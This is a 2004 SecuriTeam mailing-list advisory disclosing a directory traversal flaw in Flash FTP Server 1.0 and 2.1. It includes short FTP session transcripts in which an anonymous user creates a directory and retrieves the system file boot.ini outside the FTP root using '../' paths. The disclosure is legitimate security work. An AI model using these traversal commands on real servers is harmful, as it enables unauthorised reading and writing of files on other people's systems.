[NT] Flash FTP Server Directory Traversal

From: SecuriTeam (support_at_securiteam.com)
Date: 01/05/04

  • Next message: SecuriTeam: "[NT] Webcam Watchdog Stack Overflow Vulnerability"
    To: list@securiteam.com
    Date: 5 Jan 2004 15:16:03 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Flash FTP Server Directory Traversal
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.net2soft.com/products/flashftpserver.htm> Flash FTP Server is
    "a powerful, flexible, and easy-to-set-up FTP server for all Windows
    platforms". A vulnerability in the product allows a malicious user to
    write and read files anywhere on the disk.

    DETAILS

    Vulnerable systems:
     * Flash FTP Server version 1.0
     * Flash FTP Server version 2.1

    Demonstration:
    Creation of a directory outside the bounding FTP root directory:
    220 Flash FTP Server v2.1 ready...
    user anonymous
    331 Password required for anonymous.
    pass
    230 User anonymous logged in.
    pwd
    257 "/C:/ftp_root/" is current directory.
    mkd /../../../../../../../owned
    257 'C:\..\..\..\..\..\..\..\owned': directory created.

    Retrieving of a file outside the bounding FTP root directory:
    220 Flash FTP Server v2.1 ready...
    user anonymous
    331 Password required for anonymous.
    pass
    230 User anonymous logged in.
    ftp> get /../../../../../../../../boot.ini

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:dr_insane@pathfinder.gr>
    dr_insane.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Webcam Watchdog Stack Overflow Vulnerability"